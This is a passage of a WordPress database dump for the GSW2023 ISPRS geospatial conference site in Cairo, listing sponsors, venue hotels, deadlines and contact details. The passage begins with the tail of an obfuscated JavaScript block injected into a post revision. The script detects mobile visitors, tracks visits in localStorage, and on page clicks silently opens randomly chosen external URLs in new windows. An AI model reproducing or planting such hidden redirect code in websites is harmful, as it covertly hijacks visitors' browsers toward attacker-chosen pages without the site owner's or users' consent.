)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:47:40','2023-06-14 10:47:40','',3066,'https://gsw2023.com/?p=4697',0,'revision','',0),
(4698,1,'2023-06-14 10:48:16','2023-06-14 10:48:16','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"01.png\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 